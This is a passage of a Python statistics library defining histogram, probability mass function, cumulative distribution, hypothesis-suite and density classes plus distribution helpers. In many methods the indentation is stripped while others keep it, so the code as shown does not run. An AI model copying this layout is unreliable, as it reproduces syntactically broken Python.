self.Remove(x)
def Exp(self, m=None):
"""Exponentiates the probabilities.
m: how much to shift the ps before exponentiating
If m is None, normalizes so that the largest prob is 1.
"""
if not self.log:
raise ValueError("Pmf/Hist not under a log transform")
self.log = False
if m is None:
m = self.MaxLike()
for x, p in self.d.items():
self.Set(x, math.exp(p - m))
def GetDict(self):
"""Gets the dictionary."""
return self.d
def SetDict(self, d):
"""Sets the dictionary."""
self.d = d
def Values(self):
"""Gets an unsorted sequence of values.
Note: one source of confusion is that the keys of this
dictionary are the values of the Hist/Pmf, and the
values of the dictionary are frequencies/probabilities.
"""
return self.d.keys()
def Items(self):
"""Gets an unsorted sequence of (value, freq/prob) pairs."""
return self.d.items()
def Render(self, **options):
"""Generates a sequence of points suitable for plotting.
Note: options are ignored
Returns:
tuple of (sorted value sequence, freq/prob sequence)
"""
if min(self.d.keys()) is np.nan:
logging.warning('Hist: contains NaN, may not render correctly.')
return zip(*sorted(self.Items()))
def MakeCdf(self, label=None):
"""Makes a Cdf."""
label = label if label is not None else self.label
return Cdf(self, label=label)
def Print(self):
"""Prints the values and freqs/probs in ascending order."""
for val, prob in sorted(self.d.items()):
print(val, prob)
def Set(self, x, y=0):
"""Sets the freq/prob associated with the value x.
Args:
x: number value
y: number freq or prob
"""
self.d[x] = y
def Incr(self, x, term=1):
"""Increments the freq/prob associated with the value x.
Args:
x: number value
term: how much to increment by
"""
self.d[x] = self.d.get(x, 0) + term
def Mult(self, x, factor):
"""Scales the freq/prob associated with the value x.
Args:
x: number value
factor: how much to multiply by
"""
self.d[x] = self.d.get(x, 0) * factor
def Remove(self, x):
"""Removes a value.
Throws an exception if the value is not there.
Args:
x: value to remove
"""
del self.d[x]
def Total(self):
"""Returns the total of the frequencies/probabilities in the map."""
total = sum(self.d.values())
return total
def MaxLike(self):
"""Returns the largest frequency/probability in the map."""
return max(self.d.values())
def Largest(self, n=10):
"""Returns the largest n values, with frequency/probability.
n: number of items to return
"""
return sorted(self.d.items(), reverse=True)[:n]
def Smallest(self, n=10):
"""Returns the smallest n values, with frequency/probability.
n: number of items to return
"""
return sorted(self.d.items(), reverse=False)[:n]
class Hist(_DictWrapper):
    """Represents a histogram, which is a map from values to frequencies.

    Values can be any hashable type; frequencies are integer counters.
    """

    def Freq(self, x):
        """Gets the frequency associated with the value x.

        Args:
            x: number value

        Returns:
            int frequency
        """
        return self.d.get(x, 0)

    def Freqs(self, xs):
        """Gets frequencies for a sequence of values."""
        return [self.Freq(value) for value in xs]

    def IsSubset(self, other):
        """Checks whether the values in this histogram are a subset of
        the values in the given histogram."""
        return all(freq <= other.Freq(val) for val, freq in self.Items())

    def Subtract(self, other):
        """Subtracts the values in the given histogram from this histogram."""
        for val, freq in other.Items():
            self.Incr(val, -freq)
class Pmf(_DictWrapper):
"""Represents a probability mass function.
Values can be any hashable type; probabilities are floating-point.
Pmfs are not necessarily normalized.
"""
def Prob(self, x, default=0):
"""Gets the probability associated with the value x.
Args:
x: number value
default: value to return if the key is not there
Returns:
float probability
"""
return self.d.get(x, default)
def Probs(self, xs):
"""Gets probabilities for a sequence of values."""
return [self.Prob(x) for x in xs]
def Percentile(self, percentage):
"""Computes a percentile of a given Pmf.
Note: this is not super efficient. If you are planning
to compute more than a few percentiles, compute the Cdf.
percentage: float 0-100
returns: value from the Pmf
"""
p = percentage / 100.0
total = 0
for val, prob in sorted(self.Items()):
total += prob
if total >= p:
return val
def ProbGreater(self, x):
"""Probability that a sample from this Pmf exceeds x.
x: number
returns: float probability
"""
if isinstance(x, _DictWrapper):
return PmfProbGreater(self, x)
else:
t = [prob for (val, prob) in self.d.items() if val > x]
return sum(t)
def ProbLess(self, x):
"""Probability that a sample from this Pmf is less than x.
x: number
returns: float probability
"""
if isinstance(x, _DictWrapper):
return PmfProbLess(self, x)
else:
t = [prob for (val, prob) in self.d.items() if val < x]
return sum(t)
def __lt__(self, obj):
"""Less than.
obj: number or _DictWrapper
returns: float probability
"""
return self.ProbLess(obj)
def __gt__(self, obj):
"""Greater than.
obj: number or _DictWrapper
returns: float probability
"""
return self.ProbGreater(obj)
def __ge__(self, obj):
"""Greater than or equal.
obj: number or _DictWrapper
returns: float probability
"""
return 1 - (self < obj)
def __le__(self, obj):
"""Less than or equal.
obj: number or _DictWrapper
returns: float probability
"""
return 1 - (self > obj)
def Normalize(self, fraction=1.0):
"""Normalizes this PMF so the sum of all probs is fraction.
Args:
fraction: what the total should be after normalization
Returns: the total probability before normalizing
"""
if self.log:
raise ValueError("Normalize: Pmf is under a log transform")
total = self.Total()
if total == 0.0:
raise ValueError('Normalize: total probability is zero.')
#logging.warning('Normalize: total probability is zero.')
#return total
factor = fraction / total
for x in self.d:
self.d[x] *= factor
return total
def Random(self):
"""Chooses a random element from this PMF.
Note: this is not very efficient. If you plan to call
this more than a few times, consider converting to a CDF.
Returns:
float value from the Pmf
"""
target = random.random()
total = 0.0
for x, p in self.d.items():
total += p
if total >= target:
return x
# we shouldn't get here
raise ValueError('Random: Pmf might not be normalized.')
def Mean(self):
"""Computes the mean of a PMF.
Returns:
float mean
"""
mean = 0.0
for x, p in self.d.items():
mean += p * x
return mean
def Var(self, mu=None):
"""Computes the variance of a PMF.
mu: the point around which the variance is computed;
if omitted, computes the mean
returns: float variance
"""
if mu is None:
mu = self.Mean()
var = 0.0
for x, p in self.d.items():
var += p * (x - mu) ** 2
return var
def Std(self, mu=None):
"""Computes the standard deviation of a PMF.
mu: the point around which the variance is computed;
if omitted, computes the mean
returns: float standard deviation
"""
var = self.Var(mu)
return math.sqrt(var)
def MaximumLikelihood(self):
"""Returns the value with the highest probability.
Returns: float probability
"""
_, val = max((prob, val) for val, prob in self.Items())
return val
def CredibleInterval(self, percentage=90):
"""Computes the central credible interval.
If percentage=90, computes the 90% CI.
Args:
percentage: float between 0 and 100
Returns:
sequence of two floats, low and high
"""
cdf = self.MakeCdf()
return cdf.CredibleInterval(percentage)
def __add__(self, other):
"""Computes the Pmf of the sum of values drawn from self and other.
other: another Pmf or a scalar
returns: new Pmf
"""
try:
return self.AddPmf(other)
except AttributeError:
return self.AddConstant(other)
def AddPmf(self, other):
"""Computes the Pmf of the sum of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
for v2, p2 in other.Items():
pmf.Incr(v1 + v2, p1 * p2)
return pmf
def AddConstant(self, other):
"""Computes the Pmf of the sum a constant and values from self.
other: a number
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
pmf.Set(v1 + other, p1)
return pmf
def __sub__(self, other):
"""Computes the Pmf of the diff of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
try:
return self.SubPmf(other)
except AttributeError:
return self.AddConstant(-other)
def SubPmf(self, other):
"""Computes the Pmf of the diff of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
for v2, p2 in other.Items():
pmf.Incr(v1 - v2, p1 * p2)
return pmf
def __mul__(self, other):
"""Computes the Pmf of the product of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
try:
return self.MulPmf(other)
except AttributeError:
return self.MulConstant(other)
    def MulPmf(self, other):
        """Computes the Pmf of the product of values drawn from self and other.

        other: another Pmf

        returns: new Pmf
        """
        pmf = Pmf()
        # Every pair (v1, v2) contributes probability p1*p2 to the product v1*v2.
        for v1, p1 in self.Items():
            for v2, p2 in other.Items():
                pmf.Incr(v1 * v2, p1 * p2)
        return pmf
def MulConstant(self, other):
"""Computes the Pmf of the product of a constant and values from self.
other: a number
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
pmf.Set(v1 * other, p1)
return pmf
def __div__(self, other):
"""Computes the Pmf of the ratio of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
try:
return self.DivPmf(other)
except AttributeError:
return self.MulConstant(1/other)
__truediv__ = __div__
def DivPmf(self, other):
"""Computes the Pmf of the ratio of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
for v2, p2 in other.Items():
pmf.Incr(v1 / v2, p1 * p2)
return pmf
def Max(self, k):
"""Computes the CDF of the maximum of k selections from this dist.
k: int
returns: new Cdf
"""
cdf = self.MakeCdf()
return cdf.Max(k)
class Joint(Pmf):
    """A joint distribution over tuples of values.

    The values are sequences (usually tuples).
    """
    def Marginal(self, i, label=None):
        """Marginal distribution of the indicated variable.

        i: index of the variable we want

        Returns: Pmf
        """
        result = Pmf(label=label)
        for values, p in self.Items():
            result.Incr(values[i], p)
        return result

    def Conditional(self, i, j, val, label=None):
        """Distribution of vs[i], conditioned on vs[j] == val.

        i: index of the variable we want
        j: which variable is conditioned on
        val: the value the jth variable has to have

        Returns: normalized Pmf
        """
        result = Pmf(label=label)
        for values, p in self.Items():
            if values[j] == val:
                result.Incr(values[i], p)
        result.Normalize()
        return result

    def MaxLikeInterval(self, percentage=90):
        """Maximum-likelihood credible interval.

        Collects the highest-probability values until their total mass
        reaches percentage/100.

        percentage: float between 0 and 100

        Returns: list of values from the suite
        """
        threshold = percentage / 100.0
        ranked = sorted(((p, v) for v, p in self.Items()), reverse=True)
        chosen = []
        cum = 0
        for p, v in ranked:
            chosen.append(v)
            cum += p
            if cum >= threshold:
                break
        return chosen
def MakeJoint(pmf1, pmf2):
    """Joint distribution of values from two independent Pmfs.

    pmf1: Pmf object
    pmf2: Pmf object

    Returns: Joint pmf of value pairs
    """
    result = Joint()
    for x, px in pmf1.Items():
        for y, py in pmf2.Items():
            result.Set((x, y), px * py)
    return result
def MakeHistFromList(t, label=None):
    """Builds a histogram from an unsorted sequence of values.

    t: sequence of numbers
    label: string label for this histogram

    Returns: Hist object
    """
    hist = Hist(t, label=label)
    return hist
def MakeHistFromDict(d, label=None):
    """Builds a histogram from a map of values to frequencies.

    d: dictionary that maps values to frequencies
    label: string label for this histogram

    Returns: Hist object
    """
    hist = Hist(d, label)
    return hist
def MakePmfFromList(t, label=None):
    """Builds a PMF from an unsorted sequence of values.

    t: sequence of numbers
    label: string label for this PMF

    Returns: Pmf object
    """
    pmf = Pmf(t, label=label)
    return pmf
def MakePmfFromDict(d, label=None):
    """Builds a PMF from a map of values to probabilities.

    d: dictionary that maps values to probabilities
    label: string label for this PMF

    Returns: Pmf object
    """
    pmf = Pmf(d, label=label)
    return pmf
def MakePmfFromItems(t, label=None):
    """Builds a PMF from a sequence of value-probability pairs.

    t: sequence of (value, probability) pairs
    label: string label for this PMF

    Returns: Pmf object
    """
    pmf = Pmf(dict(t), label=label)
    return pmf
def MakePmfFromHist(hist, label=None):
    """Builds a normalized PMF from a Hist object.

    hist: Hist object
    label: string label; defaults to the Hist's label

    Returns: Pmf object
    """
    label = hist.label if label is None else label
    return Pmf(hist, label=label)
def MakeMixture(metapmf, label='mix'):
    """Makes a mixture distribution.

    metapmf: Pmf that maps from component Pmfs to their weights.
    label: string label for the new Pmf.

    Returns: Pmf object.
    """
    mixture = Pmf(label=label)
    for component, weight in metapmf.Items():
        for value, p in component.Items():
            mixture.Incr(value, weight * p)
    return mixture
def MakeUniformPmf(low, high, n):
    """Makes a uniform Pmf over n evenly spaced values.

    low: lowest value (inclusive)
    high: highest value (inclusive)
    n: number of values
    """
    result = Pmf()
    for value in np.linspace(low, high, n):
        result.Set(value, 1)
    result.Normalize()
    return result
class Cdf(object):
    """Represents a cumulative distribution function.

    Attributes:
        xs: sequence of values
        ps: sequence of cumulative probabilities
        label: string used as a graph label.
    """
    def __init__(self, obj=None, ps=None, label=None):
        """Initializes.

        If ps is provided, obj must be the corresponding list of values.

        obj: Hist, Pmf, Cdf, Pdf, dict, pandas Series, list of pairs
        ps: list of cumulative probabilities
        label: string label
        """
        self.label = label if label is not None else '_nolegend_'

        if isinstance(obj, (_DictWrapper, Cdf, Pdf)):
            if not label:
                self.label = label if label is not None else obj.label

        if obj is None:
            # caller does not provide obj, make an empty Cdf
            self.xs = np.asarray([])
            self.ps = np.asarray([])
            if ps is not None:
                logging.warning("Cdf: can't pass ps without also passing xs.")
            return
        else:
            # if the caller provides xs and ps, just store them
            if ps is not None:
                if isinstance(ps, str):
                    logging.warning("Cdf: ps can't be a string")
                self.xs = np.asarray(obj)
                self.ps = np.asarray(ps)
                return

        # caller has provided just obj, not ps
        if isinstance(obj, Cdf):
            self.xs = copy.copy(obj.xs)
            self.ps = copy.copy(obj.ps)
            return

        if isinstance(obj, _DictWrapper):
            dw = obj
        else:
            dw = Hist(obj)

        if len(dw) == 0:
            self.xs = np.asarray([])
            self.ps = np.asarray([])
            return

        xs, freqs = zip(*sorted(dw.Items()))
        self.xs = np.asarray(xs)
        # np.float was removed in NumPy 1.20; the builtin float dtype
        # is equivalent (64-bit float).
        self.ps = np.cumsum(freqs, dtype=float)
        self.ps /= self.ps[-1]

    def __str__(self):
        return 'Cdf(%s, %s)' % (str(self.xs), str(self.ps))

    __repr__ = __str__

    def __len__(self):
        return len(self.xs)

    def __getitem__(self, x):
        return self.Prob(x)

    def __setitem__(self, x, value):
        # Cdfs are read-only through the mapping interface.  The old
        # no-argument signature made `cdf[x] = p` raise TypeError instead
        # of the intended exception.
        raise UnimplementedMethodException()

    def __delitem__(self, x):
        # See __setitem__: signature fixed to accept the key.
        raise UnimplementedMethodException()

    def __eq__(self, other):
        return np.all(self.xs == other.xs) and np.all(self.ps == other.ps)

    def Copy(self, label=None):
        """Returns a copy of this Cdf.

        label: string label for the new Cdf
        """
        if label is None:
            label = self.label
        return Cdf(list(self.xs), list(self.ps), label=label)

    def MakePmf(self, label=None):
        """Makes a Pmf from this Cdf."""
        if label is None:
            label = self.label
        return Pmf(self, label=label)

    def Values(self):
        """Returns a sorted list of values.
        """
        return self.xs

    def Items(self):
        """Returns a sorted sequence of (value, probability) pairs.

        Note: in Python3, returns an iterator.
        """
        # Differences of consecutive cumulative probabilities recover
        # the point masses.
        a = self.ps
        b = np.roll(a, 1)
        b[0] = 0
        return zip(self.xs, a - b)

    def Shift(self, term):
        """Adds a term to the xs.

        term: how much to add
        """
        new = self.Copy()
        # don't use +=, or else an int array + float yields int array
        new.xs = new.xs + term
        return new

    def Scale(self, factor):
        """Multiplies the xs by a factor.

        factor: what to multiply by
        """
        new = self.Copy()
        # don't use *=, or else an int array * float yields int array
        new.xs = new.xs * factor
        return new

    def Prob(self, x):
        """Returns CDF(x), the probability that corresponds to value x.

        Args:
            x: number

        Returns:
            float probability
        """
        if x < self.xs[0]:
            return 0.0
        index = bisect.bisect(self.xs, x)
        p = self.ps[index - 1]
        return p

    def Probs(self, xs):
        """Gets probabilities for a sequence of values.

        xs: any sequence that can be converted to NumPy array

        returns: NumPy array of cumulative probabilities
        """
        xs = np.asarray(xs)
        index = np.searchsorted(self.xs, xs, side='right')
        ps = self.ps[index - 1]
        ps[xs < self.xs[0]] = 0.0
        return ps

    ProbArray = Probs

    def Value(self, p):
        """Returns InverseCDF(p), the value that corresponds to probability p.

        Args:
            p: number in the range [0, 1]

        Returns:
            number value
        """
        if p < 0 or p > 1:
            raise ValueError('Probability p must be in range [0, 1]')

        index = bisect.bisect_left(self.ps, p)
        return self.xs[index]

    def ValueArray(self, ps):
        """Returns InverseCDF(p) for an array of probabilities.

        Args:
            ps: NumPy array of numbers in the range [0, 1]

        Returns:
            NumPy array of values
        """
        ps = np.asarray(ps)
        if np.any(ps < 0) or np.any(ps > 1):
            raise ValueError('Probability p must be in range [0, 1]')

        index = np.searchsorted(self.ps, ps, side='left')
        return self.xs[index]

    def Percentile(self, p):
        """Returns the value that corresponds to percentile p.

        Args:
            p: number in the range [0, 100]

        Returns:
            number value
        """
        return self.Value(p / 100.0)

    def PercentileRank(self, x):
        """Returns the percentile rank of the value x.

        x: potential value in the CDF

        returns: percentile rank in the range 0 to 100
        """
        return self.Prob(x) * 100.0

    def Random(self):
        """Chooses a random value from this distribution."""
        return self.Value(random.random())

    def Sample(self, n):
        """Generates a random sample from this distribution.

        n: int length of the sample

        returns: NumPy array
        """
        ps = np.random.random(n)
        return self.ValueArray(ps)

    def Mean(self):
        """Computes the mean of a CDF.

        Returns:
            float mean
        """
        # sum of x * (mass at x), recovered from consecutive differences
        old_p = 0
        total = 0.0
        for x, new_p in zip(self.xs, self.ps):
            p = new_p - old_p
            total += p * x
            old_p = new_p
        return total

    def CredibleInterval(self, percentage=90):
        """Computes the central credible interval.

        If percentage=90, computes the 90% CI.

        Args:
            percentage: float between 0 and 100

        Returns:
            sequence of two floats, low and high
        """
        prob = (1 - percentage / 100.0) / 2
        interval = self.Value(prob), self.Value(1 - prob)
        return interval

    ConfidenceInterval = CredibleInterval

    def _Round(self, multiplier=1000.0):
        """
        An entry is added to the cdf only if the percentile differs
        from the previous value in a significant digit, where the number
        of significant digits is determined by multiplier.  The
        default is 1000, which keeps log10(1000) = 3 significant digits.
        """
        # TODO(write this method)
        raise UnimplementedMethodException()

    def Render(self, **options):
        """Generates a sequence of points suitable for plotting.

        An empirical CDF is a step function; linear interpolation
        can be misleading.

        Note: options are ignored

        Returns:
            tuple of (xs, ps)
        """
        def interleave(a, b):
            c = np.empty(a.shape[0] + b.shape[0])
            c[::2] = a
            c[1::2] = b
            return c

        a = np.array(self.xs)
        xs = interleave(a, a)
        shift_ps = np.roll(self.ps, 1)
        shift_ps[0] = 0
        ps = interleave(shift_ps, self.ps)
        return xs, ps

    def Max(self, k):
        """Computes the CDF of the maximum of k selections from this dist.

        k: int

        returns: new Cdf
        """
        cdf = self.Copy()
        cdf.ps **= k
        return cdf
def MakeCdfFromItems(items, label=None):
    """Builds a CDF from an unsorted sequence of (value, frequency) pairs.

    items: unsorted sequence of (value, frequency) pairs
    label: string label for this CDF

    Returns: Cdf object
    """
    return Cdf(dict(items), label=label)
def MakeCdfFromDict(d, label=None):
    """Builds a CDF from a dictionary that maps values to frequencies.

    d: dictionary that maps values to frequencies.
    label: string label for the data.

    Returns: Cdf object
    """
    cdf = Cdf(d, label=label)
    return cdf
def MakeCdfFromList(seq, label=None):
    """Creates a CDF from an unsorted sequence.

    seq: unsorted sequence of sortable values
    label: string label for the cdf

    Returns: Cdf object
    """
    cdf = Cdf(seq, label=label)
    return cdf
def MakeCdfFromHist(hist, label=None):
    """Builds a CDF from a Hist object.

    hist: Pmf.Hist object
    label: string label; defaults to the Hist's label

    Returns: Cdf object
    """
    label = hist.label if label is None else label
    return Cdf(hist, label=label)
def MakeCdfFromPmf(pmf, label=None):
    """Builds a CDF from a Pmf object.

    pmf: Pmf.Pmf object
    label: string label; defaults to the Pmf's label

    Returns: Cdf object
    """
    label = pmf.label if label is None else label
    return Cdf(pmf, label=label)
class UnimplementedMethodException(Exception):
    """Raised when a method that should be overridden is called."""
class Suite(Pmf):
    """Represents a suite of hypotheses and their probabilities.

    Subclasses must provide Likelihood (and LogLikelihood if they use
    the log-based update methods).
    """
    def Update(self, data):
        """Updates each hypothesis based on the data.

        Applies Bayes's theorem: multiplies each prior probability by
        the likelihood of the data under that hypothesis, then
        renormalizes.

        data: any representation of the data

        returns: the normalizing constant
        """
        for hypo in self.Values():
            like = self.Likelihood(data, hypo)
            self.Mult(hypo, like)
        return self.Normalize()
    def LogUpdate(self, data):
        """Updates a suite of hypotheses based on new data.

        Works in log-probability space: adds the log likelihood instead
        of multiplying.

        Modifies the suite directly; if you want to keep the original, make
        a copy.

        Note: unlike Update, LogUpdate does not normalize.

        Args:
            data: any representation of the data
        """
        for hypo in self.Values():
            like = self.LogLikelihood(data, hypo)
            self.Incr(hypo, like)
    def UpdateSet(self, dataset):
        """Updates each hypothesis based on the dataset.

        This is more efficient than calling Update repeatedly because
        it waits until the end to Normalize.

        Modifies the suite directly; if you want to keep the original, make
        a copy.

        dataset: a sequence of data

        returns: the normalizing constant
        """
        for data in dataset:
            for hypo in self.Values():
                like = self.Likelihood(data, hypo)
                self.Mult(hypo, like)
        return self.Normalize()
    def LogUpdateSet(self, dataset):
        """Updates each hypothesis based on the dataset, in log space.

        Modifies the suite directly; if you want to keep the original, make
        a copy.

        dataset: a sequence of data

        returns: None
        """
        for data in dataset:
            self.LogUpdate(data)
    def Likelihood(self, data, hypo):
        """Computes the likelihood of the data under the hypothesis.

        Abstract: subclasses must override.

        hypo: some representation of the hypothesis
        data: some representation of the data
        """
        raise UnimplementedMethodException()
    def LogLikelihood(self, data, hypo):
        """Computes the log likelihood of the data under the hypothesis.

        Abstract: subclasses must override.

        hypo: some representation of the hypothesis
        data: some representation of the data
        """
        raise UnimplementedMethodException()
    def Print(self):
        """Prints the hypotheses and their probabilities, sorted by hypothesis."""
        for hypo, prob in sorted(self.Items()):
            print(hypo, prob)
    def MakeOdds(self):
        """Transforms from probabilities to odds, in place.

        Values with prob=0 are removed.
        """
        # NOTE(review): this mutates the suite (Set/Remove) while iterating
        # self.Items(); safe only if Items() returns a materialized list
        # rather than a live dict view -- verify against the Pmf base class.
        for hypo, prob in self.Items():
            if prob:
                self.Set(hypo, Odds(prob))
            else:
                self.Remove(hypo)
    def MakeProbs(self):
        """Transforms from odds to probabilities, in place."""
        # NOTE(review): same mutate-while-iterating caveat as MakeOdds.
        for hypo, odds in self.Items():
            self.Set(hypo, Probability(odds))
def MakeSuiteFromList(t, label=None):
    """Builds a suite from an unsorted sequence of values.

    t: sequence of numbers
    label: string label for this suite

    Returns: Suite object
    """
    hist = MakeHistFromList(t, label=label)
    return MakeSuiteFromDict(hist.GetDict())
def MakeSuiteFromHist(hist, label=None):
    """Builds a normalized suite from a Hist object.

    hist: Hist object
    label: string label; defaults to the Hist's label

    Returns: Suite object
    """
    label = hist.label if label is None else label
    # copy the dictionary so the Hist is not shared with the Suite
    return MakeSuiteFromDict(dict(hist.GetDict()), label)
def MakeSuiteFromDict(d, label=None):
    """Builds a suite from a map of values to probabilities.

    d: dictionary that maps values to probabilities
    label: string label for this suite

    Returns: normalized Suite object
    """
    result = Suite(label=label)
    result.SetDict(d)
    result.Normalize()
    return result
class Pdf(object):
    """Abstract base class for probability density functions."""

    def Density(self, x):
        """Evaluates this Pdf at x.  Subclasses must override.

        Returns: float or NumPy array of probability density
        """
        raise UnimplementedMethodException()

    def GetLinspace(self):
        """Returns a default numpy array of x locations for plotting.

        Not all subclasses of Pdf implement this.
        """
        raise UnimplementedMethodException()

    def MakePmf(self, **options):
        """Makes a discrete approximation of this Pdf.

        options can include
            label: string
            low: low end of range
            high: high end of range
            n: number of places to evaluate

        Returns: new Pmf
        """
        label = options.pop('label', '')
        xs, ds = self.Render(**options)
        return Pmf(dict(zip(xs, ds)), label=label)

    def Render(self, **options):
        """Generates (xs, densities) suitable for plotting.

        If options includes low and high, the density is evaluated at
        n locations between them (inclusive).  Otherwise, if options
        includes xs, those locations are used; failing that,
        self.GetLinspace provides them.

        Returns: tuple of (xs, densities)
        """
        low = options.pop('low', None)
        high = options.pop('high', None)
        if low is not None and high is not None:
            xs = np.linspace(low, high, options.pop('n', 101))
        else:
            xs = options.pop('xs', None)
            if xs is None:
                xs = self.GetLinspace()
        return xs, self.Density(xs)

    def Items(self):
        """Generates a sequence of (value, density) pairs."""
        return zip(*self.Render())
class NormalPdf(Pdf):
    """PDF of a Gaussian (Normal) distribution."""

    def __init__(self, mu=0, sigma=1, label=None):
        """Constructs a Normal Pdf.

        mu: mean
        sigma: standard deviation
        label: string
        """
        self.mu = mu
        self.sigma = sigma
        self.label = '_nolegend_' if label is None else label

    def __str__(self):
        return 'NormalPdf(%f, %f)' % (self.mu, self.sigma)

    def GetLinspace(self):
        """Default plotting range: mu +/- 3 sigma."""
        half_width = 3 * self.sigma
        return np.linspace(self.mu - half_width, self.mu + half_width, 101)

    def Density(self, xs):
        """Probability density at xs (scalar or sequence of floats)."""
        return stats.norm.pdf(xs, self.mu, self.sigma)
class ExponentialPdf(Pdf):
    """PDF of an exponential distribution."""

    def __init__(self, lam=1, label=None):
        """Constructs an exponential Pdf.

        lam: rate parameter
        label: string
        """
        self.lam = lam
        self.label = '_nolegend_' if label is None else label

    def __str__(self):
        return 'ExponentialPdf(%f)' % (self.lam)

    def GetLinspace(self):
        """Default plotting range: 0 to 5 mean lifetimes."""
        return np.linspace(0, 5.0 / self.lam, 101)

    def Density(self, xs):
        """Probability density at xs (scalar or sequence of floats)."""
        return stats.expon.pdf(xs, scale=1.0 / self.lam)
class EstimatedPdf(Pdf):
    """PDF estimated from a sample by Gaussian KDE."""

    def __init__(self, sample, label=None):
        """Estimates the density function based on a sample.

        sample: sequence of data
        label: string
        """
        self.label = '_nolegend_' if label is None else label
        self.kde = stats.gaussian_kde(sample)
        self.linspace = np.linspace(min(sample), max(sample), 101)

    def __str__(self):
        return 'EstimatedPdf(label=%s)' % str(self.label)

    def GetLinspace(self):
        """Linspace spanning the observed sample."""
        return self.linspace

    def Density(self, xs):
        """KDE density at xs.

        returns: float or NumPy array of probability density
        """
        return self.kde.evaluate(xs)

    def Sample(self, n):
        """Draws a random sample of size n from the estimated Pdf."""
        # resample returns a 2-D array; flatten to 1-D
        return self.kde.resample(n).flatten()
def CredibleInterval(pmf, percentage=90):
    """Computes the central credible interval of a distribution.

    pmf: Pmf object representing a posterior distribution
    percentage: float between 0 and 100

    Returns: sequence of two floats, low and high
    """
    cdf = pmf.MakeCdf()
    tail = (1 - percentage / 100.0) / 2
    return cdf.Value(tail), cdf.Value(1 - tail)
def PmfProbLess(pmf1, pmf2):
    """Probability that a value from pmf1 is less than a value from pmf2.

    pmf1: Pmf object
    pmf2: Pmf object

    Returns: float probability
    """
    # start at 0.0 so the result is a float even when no pair qualifies
    return sum((p1 * p2
                for v1, p1 in pmf1.Items()
                for v2, p2 in pmf2.Items()
                if v1 < v2), 0.0)
def PmfProbGreater(pmf1, pmf2):
    """Probability that a value from pmf1 is greater than a value from pmf2.

    pmf1: Pmf object
    pmf2: Pmf object

    Returns: float probability
    """
    # start at 0.0 so the result is a float even when no pair qualifies
    return sum((p1 * p2
                for v1, p1 in pmf1.Items()
                for v2, p2 in pmf2.Items()
                if v1 > v2), 0.0)
def PmfProbEqual(pmf1, pmf2):
    """Probability that a value from pmf1 equals a value from pmf2.

    pmf1: Pmf object
    pmf2: Pmf object

    Returns: float probability
    """
    # start at 0.0 so the result is a float even when no pair qualifies
    return sum((p1 * p2
                for v1, p1 in pmf1.Items()
                for v2, p2 in pmf2.Items()
                if v1 == v2), 0.0)
def RandomSum(dists):
    """Chooses a random value from each dist and returns the sum.

    dists: sequence of Pmf or Cdf objects

    returns: numerical sum
    """
    return sum(d.Random() for d in dists)
def SampleSum(dists, n):
    """Draws a sample of sums from a list of distributions.

    dists: sequence of Pmf or Cdf objects
    n: sample size

    returns: new Pmf of sums
    """
    return Pmf(RandomSum(dists) for _ in range(n))
def EvalNormalPdf(x, mu, sigma):
    """Computes the PDF of the normal distribution.

    x: value
    mu: mean
    sigma: standard deviation

    returns: float probability density
    """
    return stats.norm.pdf(x, loc=mu, scale=sigma)
def MakeNormalPmf(mu, sigma, num_sigmas, n=201):
    """Discrete approximation of a Normal distribution.

    mu: float mean
    sigma: float standard deviation
    num_sigmas: how many sigmas to extend in each direction
    n: number of values in the Pmf

    returns: normalized Pmf
    """
    result = Pmf()
    spread = num_sigmas * sigma
    for x in np.linspace(mu - spread, mu + spread, n):
        result.Set(x, EvalNormalPdf(x, mu, sigma))
    result.Normalize()
    return result
def EvalBinomialPmf(k, n, p):
    """Evaluates the binomial PMF.

    Returns the probability of k successes in n trials with probability p.
    """
    prob = stats.binom.pmf(k, n, p)
    return prob
def MakeBinomialPmf(n, p):
    """Distribution of the number of successes in n trials with probability p.

    returns: Pmf over 0..n
    """
    result = Pmf()
    for k in range(n + 1):
        result[k] = stats.binom.pmf(k, n, p)
    return result
def EvalHypergeomPmf(k, N, K, n):
    """Evaluates the hypergeometric PMF.

    Returns the probability of k successes in n trials from a population
    N with K successes in it.
    """
    prob = stats.hypergeom.pmf(k, N, K, n)
    return prob
def EvalPoissonPmf(k, lam):
    """Computes the Poisson PMF.

    k: number of events
    lam: parameter lambda in events per unit time

    returns: float probability
    """
    # deliberately not stats.poisson.pmf: that returns NaN for lam=0,
    # where the correct value is 0.0 (or 1.0 at k=0)
    numerator = lam ** k * math.exp(-lam)
    return numerator / special.gamma(k + 1)
def MakePoissonPmf(lam, high, step=1):
    """Discrete approximation of a Poisson distribution.

    lam: parameter lambda in events per unit time
    high: upper bound of the Pmf
    step: spacing between values

    returns: normalized Pmf
    """
    result = Pmf()
    for k in range(0, high + 1, step):
        result.Set(k, EvalPoissonPmf(k, lam))
    result.Normalize()
    return result
def EvalExponentialPdf(x, lam):
    """Computes the exponential PDF.

    x: value
    lam: parameter lambda in events per unit time

    returns: float probability density
    """
    density = lam * math.exp(-lam * x)
    return density
def EvalExponentialCdf(x, lam):
    """Evaluates the CDF of the exponential distribution with parameter lam."""
    survival = math.exp(-lam * x)
    return 1 - survival
def MakeExponentialPmf(lam, high, n=200):
    """Discrete approximation of an exponential distribution.

    lam: parameter lambda in events per unit time
    high: upper bound
    n: number of values in the Pmf

    returns: normalized Pmf
    """
    result = Pmf()
    for x in np.linspace(0, high, n):
        result.Set(x, EvalExponentialPdf(x, lam))
    result.Normalize()
    return result
def StandardNormalCdf(x):
    """Evaluates the CDF of the standard Normal distribution.

    See http://en.wikipedia.org/wiki/Normal_distribution
    #Cumulative_distribution_function

    x: float

    Returns: float
    """
    return 0.5 * (math.erf(x / ROOT2) + 1)
def EvalNormalCdf(x, mu=0, sigma=1):
    """Evaluates the CDF of the normal distribution.

    x: float
    mu: mean parameter
    sigma: standard deviation parameter

    Returns: float
    """
    return stats.norm.cdf(x, mu, sigma)
def EvalNormalCdfInverse(p, mu=0, sigma=1):
    """Evaluates the inverse CDF (quantile function) of the normal distribution.

